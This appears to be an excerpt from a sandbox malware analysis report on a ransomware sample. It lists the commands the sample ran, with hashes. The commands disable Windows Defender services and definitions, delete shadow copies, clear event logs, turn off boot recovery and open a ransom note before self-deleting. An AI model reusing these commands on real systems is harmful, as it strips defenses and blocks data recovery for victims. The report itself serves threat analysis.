PID:2908 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1368
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1668
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2276 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2972
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1972 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2956 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4076 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1852 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4072 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3916
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4088 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2952 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\rFSH_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1196 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe"2⤵PID:528
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2564
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5    8592ba100a78835a6b94d5949e13dfc1
SHA1   63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5    f870881943d24780f2dbf4e977e6d7de
SHA1   aa50b904f589b23167f312145965ea24fb5fd704
SHA256 a4000e29572e1c189ac881d3780257389b1adcdfc92d4546785d51e1169eab31
SHA512 d8535bcf40c33eafa3903a980cb0777cd32af833268f8d512a9f4fef5856c8208a7d57b197dc6829dfeaa8061cae59822e219954f83dc5028a6805fd59d54875
-
MD5    9feb836dd50f68cbf9e87dad21a2fbc4
SHA1   f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256 773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512 123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748